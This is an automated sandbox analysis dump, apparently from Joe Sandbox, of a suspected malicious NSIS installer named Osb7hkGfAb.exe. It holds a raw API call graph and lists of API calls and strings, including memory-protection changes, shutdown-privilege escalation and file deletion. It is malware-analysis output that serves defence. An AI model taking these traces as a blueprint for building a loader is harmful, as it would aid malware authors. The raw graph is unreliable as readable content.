4693 402bce 17 API calls 4692->4693 
4694 402186 4693->4694 4695 402bce 17 API calls 4694->4695 4696 402193 4695->4696 4697 402bce 17 API calls 4696->4697 4698 40219d 4697->4698 4699 4021df CoCreateInstance 4698->4699 4700 402bce 17 API calls 4698->4700 4703 4021fe 4699->4703 4705 4022ac 4699->4705 4700->4699 4701 401423 24 API calls 4702 4022e2 4701->4702 4704 40228c MultiByteToWideChar 4703->4704 4703->4705 4704->4705 4705->4701 4705->4702 5069 4022eb 5070 402bce 17 API calls 5069->5070 5071 4022f1 5070->5071 5072 402bce 17 API calls 5071->5072 5073 4022fa 5072->5073 5074 402bce 17 API calls 5073->5074 5075 402303 5074->5075 5076 40646b 2 API calls 5075->5076 5077 40230c 5076->5077 5078 40231d lstrlenA lstrlenA 5077->5078 5082 402310 5077->5082 5079 40521e 24 API calls 5078->5079 5081 402359 SHFileOperationA 5079->5081 5080 40521e 24 API calls 5083 402318 5080->5083 5081->5082 5081->5083 5082->5080 5082->5083 4715 40266d 4716 402bac 17 API calls 4715->4716 4721 402677 4716->4721 4717 4026e5 4718 405d08 ReadFile 4718->4721 4719 4026e7 4724 406055 wsprintfA 4719->4724 4720 4026f7 4720->4717 4723 40270d SetFilePointer 4720->4723 4721->4717 4721->4718 4721->4719 4721->4720 4723->4717 4724->4717 5084 40236d 5085 402374 5084->5085 5088 402387 5084->5088 5086 40618a 17 API calls 5085->5086 5087 402381 5086->5087 5087->5088 5089 405813 MessageBoxIndirectA 5087->5089 5089->5088 5090 4019ed 5091 402bce 17 API calls 5090->5091 5092 4019f4 5091->5092 5093 402bce 17 API calls 5092->5093 5094 4019fd 5093->5094 5095 401a04 lstrcmpiA 5094->5095 5096 401a16 lstrcmpA 5094->5096 5097 401a0a 5095->5097 5096->5097 5098 40296e 5099 402bac 17 API calls 5098->5099 5100 402974 5099->5100 5101 4029af 5100->5101 5102 4027bf 5100->5102 5104 402986 5100->5104 5101->5102 5103 40618a 17 API calls 5101->5103 5103->5102 5104->5102 5106 406055 wsprintfA 5104->5106 5106->5102 4747 700e2921 4748 700e2971 4747->4748 4749 700e2931 VirtualProtect 4747->4749 4749->4748 5107 700e103d 5108 700e101b 5 API calls 5107->5108 5109 700e1056 
5108->5109 5110 4014f4 SetForegroundWindow 5111 402a5a 5110->5111 4764 402476 4765 402bce 17 API calls 4764->4765 4766 402488 4765->4766 4767 402bce 17 API calls 4766->4767 4768 402492 4767->4768 4781 402c5e 4768->4781 4771 402a5a 4772 4024c7 4773 4024d3 4772->4773 4775 402bac 17 API calls 4772->4775 4776 4024f5 RegSetValueExA 4773->4776 4778 4030d8 31 API calls 4773->4778 4774 402bce 17 API calls 4777 4024c0 lstrlenA 4774->4777 4775->4773 4779 40250b RegCloseKey 4776->4779 4777->4772 4778->4776 4779->4771 4782 402c79 4781->4782 4785 405fab 4782->4785 4786 405fba 4785->4786 4787 4024a2 4786->4787 4788 405fc5 RegCreateKeyExA 4786->4788 4787->4771 4787->4772 4787->4774 4788->4787 5112 700e1638 5113 700e1667 5112->5113 5114 700e1a98 18 API calls 5113->5114 5115 700e166e 5114->5115 5116 700e1675 5115->5116 5117 700e1681 5115->5117 5118 700e1266 2 API calls 5116->5118 5119 700e168b 5117->5119 5120 700e16a8 5117->5120 5121 700e167f 5118->5121 5122 700e14e2 3 API calls 5119->5122 5123 700e16ae 5120->5123 5124 700e16d2 5120->5124 5126 700e1690 5122->5126 5127 700e1559 3 API calls 5123->5127 5125 700e14e2 3 API calls 5124->5125 5125->5121 5128 700e1559 3 API calls 5126->5128 5129 700e16b3 5127->5129 5130 700e1696 5128->5130 5131 700e1266 2 API calls 5129->5131 5132 700e1266 2 API calls 5130->5132 5133 700e16b9 GlobalFree 5131->5133 5135 700e169c GlobalFree 5132->5135 5133->5121 5134 700e16cd GlobalFree 5133->5134 5134->5121 5135->5121 5136 402777 5137 40277d 5136->5137 5138 402781 FindNextFileA 5137->5138 5141 402793 5137->5141 5139 4027d2 5138->5139 5138->5141 5142 4060f7 lstrcpynA 5139->5142 5142->5141 5143 700e1837 5144 700e185a 5143->5144 5145 700e188a GlobalFree 5144->5145 5146 700e189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5144->5146 5145->5146 5147 700e1266 2 API calls 5146->5147 5148 700e1a1e GlobalFree GlobalFree 5147->5148 5149 401ef9 5150 402bce 17 API calls 5149->5150 5151 401eff 5150->5151 5152 402bce 17 API calls 5151->5152 5153 401f08 
5152->5153 5154 402bce 17 API calls 5153->5154 5155 401f11 5154->5155 5156 402bce 17 API calls 5155->5156 5157 401f1a 5156->5157 5158 401423 24 API calls 5157->5158 5159 401f21 5158->5159 5166 4057d9 ShellExecuteExA 5159->5166 5161 401f5c 5162 406575 5 API calls 5161->5162 5163 4027bf 5161->5163 5164 401f76 CloseHandle 5162->5164 5164->5163 5166->5161 4789 401f7b 4790 402bce 17 API calls 4789->4790 4791 401f81 4790->4791 4792 40521e 24 API calls 4791->4792 4793 401f8b 4792->4793 4794 405796 2 API calls 4793->4794 4795 401f91 4794->4795 4799 4027bf 4795->4799 4803 401fb2 CloseHandle 4795->4803 4804 406575 WaitForSingleObject 4795->4804 4798 401fa6 4800 401fb4 4798->4800 4801 401fab 4798->4801 4800->4803 4809 406055 wsprintfA 4801->4809 4803->4799 4805 40658f 4804->4805 4806 4065a1 GetExitCodeProcess 4805->4806 4807 40653c 2 API calls 4805->4807 4806->4798 4808 406596 WaitForSingleObject 4807->4808 4808->4805 4809->4803 5167 401ffb 5168 402bce 17 API calls 5167->5168 5169 402002 5168->5169 5170 406500 5 API calls 5169->5170 5171 402011 5170->5171 5172 402029 GlobalAlloc 5171->5172 5173 402091 5171->5173 5172->5173 5174 40203d 5172->5174 5175 406500 5 API calls 5174->5175 5176 402044 5175->5176 5177 406500 5 API calls 5176->5177 5178 40204e 5177->5178 5178->5173 5182 406055 wsprintfA 5178->5182 5180 402085 5183 406055 wsprintfA 5180->5183 5182->5180 5183->5173 5184 4018fd 5185 401934 5184->5185 5186 402bce 17 API calls 5185->5186 5187 401939 5186->5187 5188 4058bf 67 API calls 5187->5188 5189 401942 5188->5189 5190 401000 5191 401037 BeginPaint GetClientRect 5190->5191 5192 40100c DefWindowProcA 5190->5192 5194 4010f3 5191->5194 5195 401179 5192->5195 5196 401073 CreateBrushIndirect FillRect DeleteObject 5194->5196 5197 4010fc 5194->5197 5196->5194 5198 401102 CreateFontIndirectA 5197->5198 5199 401167 EndPaint 5197->5199 5198->5199 5200 401112 6 API calls 5198->5200 5199->5195 5200->5199 5201 401900 5202 402bce 17 API calls 5201->5202 5203 401907 5202->5203 5204 
405813 MessageBoxIndirectA 5203->5204 5205 401910 5204->5205 5206 404b80 GetDlgItem GetDlgItem 5207 404bd6 7 API calls 5206->5207 5213 404dfd 5206->5213 5208 404c72 SendMessageA 5207->5208 5209 404c7e DeleteObject 5207->5209 5208->5209 5210 404c89 5209->5210 5212 404cc0 5210->5212 5214 40618a 17 API calls 5210->5214 5211 404edf 5216 404f8b 5211->5216 5226 404f38 SendMessageA 5211->5226 5249 404df0 5211->5249 5215 40417b 18 API calls 5212->5215 5213->5211 5241 404e6c 5213->5241 5260 404ace SendMessageA 5213->5260 5219 404ca2 SendMessageA SendMessageA 5214->5219 5220 404cd4 5215->5220 5217 404f95 SendMessageA 5216->5217 5218 404f9d 5216->5218 5217->5218 5223 404fc6 5218->5223 5229 404fb6 5218->5229 5230 404faf ImageList_Destroy 5218->5230 5219->5210 5225 40417b 18 API calls 5220->5225 5221 404ed1 SendMessageA 5221->5211 5222 4041e2 8 API calls 5228 40518b 5222->5228 5231 40513f 5223->5231 5252 405001 5223->5252 5265 404b4e 5223->5265 5239 404ce5 5225->5239 5227 404f4d SendMessageA 5226->5227 5226->5249 5234 404f60 5227->5234 5229->5223 5232 404fbf GlobalFree 5229->5232 5230->5229 5235 405151 ShowWindow GetDlgItem ShowWindow 5231->5235 5231->5249 5232->5223 5233 404dbf GetWindowLongA SetWindowLongA 5236 404dd8 5233->5236 5242 404f71 SendMessageA 5234->5242 5235->5249 5237 404df5 5236->5237 5238 404ddd ShowWindow 5236->5238 5259 4041b0 SendMessageA 5237->5259 5258 4041b0 SendMessageA 5238->5258 5239->5233 5240 404d37 SendMessageA 5239->5240 5243 404dba 5239->5243 5246 404d75 SendMessageA 5239->5246 5247 404d89 SendMessageA 5239->5247 5240->5239 5241->5211 5241->5221 5242->5216 5243->5233 5243->5236 5246->5239 5247->5239 5249->5222 5250 40510b 5251 405115 InvalidateRect 5250->5251 5254 405121 5250->5254 5251->5254 5253 40502f SendMessageA 5252->5253 5257 405045 5252->5257 5253->5257 5254->5231 5274 404a89 5254->5274 5256 4050b9 SendMessageA SendMessageA 5256->5257 5257->5250 5257->5256 5258->5249 5259->5213 5261 404af1 GetMessagePos ScreenToClient SendMessageA 
5260->5261 5262 404b2d SendMessageA 5260->5262 5263 404b25 5261->5263 5264 404b2a 5261->5264 5262->5263 5263->5241 5264->5262 5277 4060f7 lstrcpynA 5265->5277 5267 404b61 5278 406055 wsprintfA 5267->5278 5269 404b6b 5270 40140b 2 API calls 5269->5270 5271 404b74 5270->5271 5279 4060f7 lstrcpynA 5271->5279 5273 404b7b 5273->5252 5280 4049c4 5274->5280 5276 404a9e 5276->5231 5277->5267 5278->5269 5279->5273 5281 4049da 5280->5281 5282 40618a 17 API calls 5281->5282 5283 404a3e 5282->5283 5284 40618a 17 API calls 5283->5284 5285 404a49 5284->5285 5286 40618a 17 API calls 5285->5286 5287 404a5f lstrlenA wsprintfA SetDlgItemTextA 5286->5287 5287->5276 5288 401502 5289 40150a 5288->5289 5291 40151d 5288->5291 5290 402bac 17 API calls 5289->5290 5290->5291 5292 402604 5293 402bce 17 API calls 5292->5293 5294 40260b 5293->5294 5297 405c90 GetFileAttributesA CreateFileA 5294->5297 5296 402617 5297->5296 5298 401b87 5299 401b94 5298->5299 5300 401bd8 5298->5300 5303 401c1c 5299->5303 5306 401bab 5299->5306 5301 401c01 GlobalAlloc 5300->5301 5302 401bdc 5300->5302 5305 40618a 17 API calls 5301->5305 5312 402387 5302->5312 5319 4060f7 lstrcpynA 5302->5319 5304 40618a 17 API calls 5303->5304 5303->5312 5308 402381 5304->5308 5305->5303 5317 4060f7 lstrcpynA 5306->5317 5308->5312 5313 405813 MessageBoxIndirectA 5308->5313 5310 401bee GlobalFree 5310->5312 5311 401bba 5318 4060f7 lstrcpynA 5311->5318 5313->5312 5315 401bc9 5320 4060f7 lstrcpynA 5315->5320 5317->5311 5318->5315 5319->5310 5320->5312 4340 402588 4352 402c0e 4340->4352 4343 402bac 17 API calls 4344 40259b 4343->4344 4345 4025a9 4344->4345 4350 4027bf 4344->4350 4346 4025c2 RegEnumValueA 4345->4346 4347 4025b6 RegEnumKeyA 4345->4347 4348 4025de RegCloseKey 4346->4348 4349 4025d7 4346->4349 4347->4348 4348->4350 4349->4348 4353 402bce 17 API calls 4352->4353 4354 402c25 4353->4354 4355 405f7d RegOpenKeyExA 4354->4355 4356 402592 4355->4356 4356->4343 4357 401389 4359 401390 4357->4359 4358 4013fe 4359->4358 4360 
4013cb MulDiv SendMessageA 4359->4360 4360->4359 5321 40460d 5322 404639 5321->5322 5323 40464a 5321->5323 5382 4057f7 GetDlgItemTextA 5322->5382 5325 404656 GetDlgItem 5323->5325 5357 4046b5 5323->5357 5327 40466a 5325->5327 5326 404644 5329 4063d2 5 API calls 5326->5329 5330 40467e SetWindowTextA 5327->5330 5337 405b28 4 API calls 5327->5337 5328 404799 5331 404943 5328->5331 5384 4057f7 GetDlgItemTextA 5328->5384 5329->5323 5333 40417b 18 API calls 5330->5333 5336 4041e2 8 API calls 5331->5336 5338 40469a 5333->5338 5334 40618a 17 API calls 5339 404729 SHBrowseForFolderA 5334->5339 5335 4047c9 5340 405b7d 18 API calls 5335->5340 5341 404957 5336->5341 5342 404674 5337->5342 5343 40417b 18 API calls 5338->5343 5339->5328 5344 404741 CoTaskMemFree 5339->5344 5345 4047cf 5340->5345 5342->5330 5348 405a8f 3 API calls 5342->5348 5346 4046a8 5343->5346 5347 405a8f 3 API calls 5344->5347 5385 4060f7 lstrcpynA 5345->5385 5383 4041b0 SendMessageA 5346->5383 5350 40474e 5347->5350 5348->5330 5353 404785 SetDlgItemTextA 5350->5353 5358 40618a 17 API calls 5350->5358 5352 4046ae 5355 406500 5 API calls 5352->5355 5353->5328 5354 4047e6 5356 406500 5 API calls 5354->5356 5355->5357 5365 4047ed 5356->5365 5357->5328 5357->5331 5357->5334 5359 40476d lstrcmpiA 5358->5359 5359->5353 5362 40477e lstrcatA 5359->5362 5360 404829 5386 4060f7 lstrcpynA 5360->5386 5362->5353 5363 404830 5364 405b28 4 API calls 5363->5364 5366 404836 GetDiskFreeSpaceA 5364->5366 5365->5360 5368 405ad6 2 API calls 5365->5368 5370 404881 5365->5370 5369 40485a MulDiv 5366->5369 5366->5370 5368->5365 5369->5370 5371 4048f2 5370->5371 5372 404a89 20 API calls 5370->5372 5373 404915 5371->5373 5375 40140b 2 API calls 5371->5375 5374 4048df 5372->5374 5387 40419d EnableWindow 5373->5387 5377 4048f4 SetDlgItemTextA 5374->5377 5378 4048e4 5374->5378 5375->5373 5377->5371 5380 4049c4 20 API calls 5378->5380 5379 404931 5379->5331 5381 404566 SendMessageA 5379->5381 5380->5371 5381->5331 5382->5326 5383->5352 
5384->5335 5385->5354 5386->5363 5387->5379 5388 401490 5389 40521e 24 API calls 5388->5389 5390 401497 5389->5390 5391 405192 5392 4051a2 5391->5392 5393 4051b6 5391->5393 5395 4051ff 5392->5395 5396 4051a8 5392->5396 5394 4051be IsWindowVisible 5393->5394 5402 4051d5 5393->5402 5394->5395 5398 4051cb 5394->5398 5399 405204 CallWindowProcA 5395->5399 5397 4041c7 SendMessageA 5396->5397 5400 4051b2 5397->5400 5401 404ace 5 API calls 5398->5401 5399->5400 5401->5402 5402->5399 5403 404b4e 4 API calls 5402->5403 5403->5395 5404 700e225a 5405 700e22c4 5404->5405 5406 700e22cf GlobalAlloc 5405->5406 5407 700e22ee 5405->5407 5406->5405 4366 402516 4367 402c0e 17 API calls 4366->4367 4368 402520 4367->4368 4369 402bce 17 API calls 4368->4369 4370 402529 4369->4370 4371 402533 RegQueryValueExA 4370->4371 4374 4027bf 4370->4374 4372 402559 RegCloseKey 4371->4372 4373 402553 4371->4373 4372->4374 4373->4372 4377 406055 wsprintfA 4373->4377 4377->4372 5408 700e1058 5410 700e1074 5408->5410 5409 700e10dc 5410->5409 5411 700e1091 5410->5411 5412 700e14bb GlobalFree 5410->5412 5413 700e14bb GlobalFree 5411->5413 5412->5411 5414 700e10a1 5413->5414 5415 700e10a8 GlobalSize 5414->5415 5416 700e10b1 5414->5416 5415->5416 5417 700e10c6 5416->5417 5418 700e10b5 GlobalAlloc 5416->5418 5420 700e10d1 GlobalFree 5417->5420 5419 700e14e2 3 API calls 5418->5419 5419->5417 5420->5409 4420 40239c 4421 4023a4 4420->4421 4424 4023aa 4420->4424 4422 402bce 17 API calls 4421->4422 4422->4424 4423 4023ba 4426 4023c8 4423->4426 4428 402bce 17 API calls 4423->4428 4424->4423 4425 402bce 17 API calls 4424->4425 4425->4423 4427 402bce 17 API calls 4426->4427 4429 4023d1 WritePrivateProfileStringA 4427->4429 4428->4426 4430 40209d 4431 4020af 4430->4431 4440 40215d 4430->4440 4432 402bce 17 API calls 4431->4432 4433 4020b6 4432->4433 4435 402bce 17 API calls 4433->4435 4434 401423 24 API calls 4441 4022e2 4434->4441 4436 4020bf 4435->4436 4437 4020d4 LoadLibraryExA 4436->4437 4438 4020c7 
GetModuleHandleA 4436->4438 4439 4020e4 GetProcAddress 4437->4439 4437->4440 4438->4437 4438->4439 4442 402130 4439->4442 4443 4020f3 4439->4443 4440->4434 4444 40521e 24 API calls 4442->4444 4445 402112 4443->4445 4446 4020fb 4443->4446 4447 402103 4444->4447 4451 700e16db 4445->4451 4493 401423 4446->4493 4447->4441 4449 402151 FreeLibrary 4447->4449 4449->4441 4452 700e170b 4451->4452 4496 700e1a98 4452->4496 4454 700e1712 4455 700e1834 4454->4455 4456 700e172a 4454->4456 4457 700e1723 4454->4457 4455->4447 4528 700e22f1 4456->4528 4545 700e22af 4457->4545 4462 700e174f 4464 700e178e 4462->4464 4465 700e1770 4462->4465 4463 700e1740 4467 700e1746 4463->4467 4472 700e1751 4463->4472 4468 700e17dc 4464->4468 4469 700e1794 4464->4469 4558 700e24d8 4465->4558 4467->4462 4539 700e2a38 4467->4539 4476 700e24d8 11 API calls 4468->4476 4577 700e156b 4469->4577 4470 700e1759 4470->4462 4555 700e2cc3 4470->4555 4471 700e1776 4569 700e1559 4471->4569 4549 700e26b2 4472->4549 4480 700e17cd 4476->4480 4484 700e1823 4480->4484 4583 700e249e 4480->4583 4482 700e1757 4482->4462 4483 700e24d8 11 API calls 4483->4480 4484->4455 4488 700e182d GlobalFree 4484->4488 4488->4455 4490 700e180f 4490->4484 4587 700e14e2 wsprintfA 4490->4587 4491 700e1808 FreeLibrary 4491->4490 4494 40521e 24 API calls 4493->4494 4495 401431 4494->4495 4495->4447 4590 700e1215 GlobalAlloc 4496->4590 4498 700e1abf 4591 700e1215 GlobalAlloc 4498->4591 4500 700e1d00 GlobalFree GlobalFree GlobalFree 4501 700e1d1d 4500->4501 4517 700e1d67 4500->4517 4504 700e20f1 4501->4504 4513 700e1d32 4501->4513 4501->4517 4502 700e1aca 4502->4500 4503 700e1bbd GlobalAlloc 4502->4503 4505 700e2033 4502->4505 4507 700e1c08 lstrcpyA 4502->4507 4508 700e1c26 GlobalFree 4502->4508 4512 700e1c12 lstrcpyA 4502->4512 4516 700e1fb7 4502->4516 4502->4517 4522 700e1ef9 GlobalFree 4502->4522 4523 700e1224 2 API calls 4502->4523 4592 700e1534 GlobalSize GlobalAlloc 4502->4592 4503->4502 4506 700e2113 GetModuleHandleA 4504->4506 
4504->4517 4505->4517 4525 700e208c lstrcpyA 4505->4525 4509 700e2139 4506->4509 4510 700e2124 LoadLibraryA 4506->4510 4507->4512 4508->4502 4598 700e15c2 GetProcAddress 4509->4598 4510->4509 4510->4517 4512->4502 4513->4517 4594 700e1224 4513->4594 4514 700e214b 4515 700e218a 4514->4515 4526 700e2174 GetProcAddress 4514->4526 4515->4517 4520 700e2197 lstrlenA 4515->4520 4597 700e1215 GlobalAlloc 4516->4597 4517->4454 4599 700e15c2 GetProcAddress 4520->4599 4522->4502 4523->4502 4525->4517 4526->4515 4527 700e1fbf 4527->4454 4529 700e230a 4528->4529 4531 700e2446 GlobalFree 4529->4531 4533 700e23b8 GlobalAlloc MultiByteToWideChar 4529->4533 4535 700e2405 4529->4535 4536 700e1224 GlobalAlloc lstrcpynA 4529->4536 4601 700e12ad 4529->4601 4531->4529 4532 700e1730 4531->4532 4532->4462 4532->4463 4532->4470 4534 700e23e4 GlobalAlloc 4533->4534 4533->4535 4537 700e23fc GlobalFree 4534->4537 4535->4531 4605 700e2646 4535->4605 4536->4529 4537->4531 4541 700e2a4a 4539->4541 4540 700e2aef VirtualAllocEx 4544 700e2b0d 4540->4544 4541->4540 4543 700e2bd9 4543->4462 4608 700e29e4 4544->4608 4546 700e22c4 4545->4546 4547 700e22cf GlobalAlloc 4546->4547 4548 700e1729 4546->4548 4547->4546 4548->4456 4553 700e26e2 4549->4553 4550 700e277d GlobalAlloc 4554 700e27a0 4550->4554 4551 700e2790 4552 700e2796 GlobalSize 4551->4552 4551->4554 4552->4554 4553->4550 4553->4551 4554->4482 4556 700e2cce 4555->4556 4557 700e2d0e GlobalFree 4556->4557 4612 700e1215 GlobalAlloc 4558->4612 4560 700e2598 WideCharToMultiByte 4561 700e24e4 4560->4561 4561->4560 4562 700e2574 StringFromGUID2 WideCharToMultiByte 4561->4562 4563 700e2563 lstrcpynA 4561->4563 4564 700e25b9 wsprintfA 4561->4564 4565 700e25dd GlobalFree 4561->4565 4566 700e2617 GlobalFree 4561->4566 4567 700e1266 2 API calls 4561->4567 4613 700e12d1 4561->4613 4562->4561 4563->4561 4564->4561 4565->4561 4566->4471 4567->4561 4617 700e1215 GlobalAlloc 4569->4617 4571 700e155e 4572 700e156b 2 API calls 4571->4572 4573 700e1568 4572->4573 
4574 700e1266 4573->4574 4575 700e126f GlobalAlloc lstrcpynA 4574->4575 4576 700e12a8 GlobalFree 4574->4576 4575->4576 4576->4480 4578 700e1577 wsprintfA 4577->4578 4579 700e15a4 lstrcpyA 4577->4579 4582 700e15bd 4578->4582 4579->4582 4582->4483 4584 700e24ac 4583->4584 4585 700e17ef 4583->4585 4584->4585 4586 700e24c5 GlobalFree 4584->4586 4585->4490 4585->4491 4586->4584 4588 700e1266 2 API calls 4587->4588 4589 700e1503 4588->4589 4589->4484 4590->4498 4591->4502 4593 700e1552 4592->4593 4593->4502 4600 700e1215 GlobalAlloc 4594->4600 4596 700e1233 lstrcpynA 4596->4517 4597->4527 4598->4514 4599->4517 4600->4596 4602 700e12b4 4601->4602 4603 700e1224 2 API calls 4602->4603 4604 700e12cf 4603->4604 4604->4529 4606 700e26aa 4605->4606 4607 700e2654 VirtualAlloc 4605->4607 4606->4535 4607->4606 4609 700e29ef 4608->4609 4610 700e29ff 4609->4610 4611 700e29f4 GetLastError 4609->4611 4610->4543 4611->4610 4612->4561 4614 700e12da 4613->4614 4615 700e12f9 4613->4615 4614->4615 4616 700e12e0 lstrcpyA 4614->4616 4615->4561 4616->4615 4617->4571 4618 40159d 4619 402bce 17 API calls 4618->4619 4620 4015a4 SetFileAttributesA 4619->4620 4621 4015b6 4620->4621 5421 40149d 5422 402387 5421->5422 5423 4014ab PostQuitMessage 5421->5423 5423->5422 5424 401a1e 5425 402bce 17 API calls 5424->5425 5426 401a27 ExpandEnvironmentStringsA 5425->5426 5427 401a3b 5426->5427 5429 401a4e 5426->5429 5428 401a40 lstrcmpA 5427->5428 5427->5429 5428->5429 4622 40171f 4623 402bce 17 API calls 4622->4623 4624 401726 SearchPathA 4623->4624 4625 401741 4624->4625 5435 401d1f 5436 402bac 17 API calls 5435->5436 5437 401d26 5436->5437 5438 402bac 17 API calls 5437->5438 5439 401d32 GetDlgItem 5438->5439 5440 402620 5439->5440 5441 700e15d1 5442 700e14bb GlobalFree 5441->5442 5444 700e15e9 5442->5444 5443 700e162f GlobalFree 5444->5443 5445 700e1604 5444->5445 5446 700e161b VirtualFree 5444->5446 5445->5443 5446->5443 4633 402421 4634 402453 4633->4634 4635 402428 4633->4635 4636 402bce 17 API calls 

Control-flow Graph (graph image not reproduced): function starting at 00403348; the original graph colour-codes basic blocks as Executed / Not Executed.
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE ref: 0040336D
                                                                          • GetVersion.KERNEL32 ref: 00403373
                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                          • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                          • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                          • GetCommandLineA.KERNEL32(datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000020,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                            • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,774D3410), ref: 004039FA
                                                                            • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                            • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                            • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                            • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                            • Part of subcall function 00403830: CloseHandle.KERNEL32(000002E8,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                          • ExitProcess.KERNEL32 ref: 00403688
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                                          • ExitProcess.KERNEL32 ref: 0040382A
                                                                            • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                                          Strings
                                                                          Memory Dump Source
• Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                          • String ID: "$"C:\Users\user\Desktop\Osb7hkGfAb.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Osb7hkGfAb.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KNw$datastrrelsers Setup$~nsu
                                                                          • API String ID: 3776617018-3656372189
                                                                          • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                          • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                          • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                          • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

Control-flow Graph (graph image not reproduced): function starting at 004058BF; the original graph colour-codes basic blocks as Executed / Not Executed.
                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                          • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                                          • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
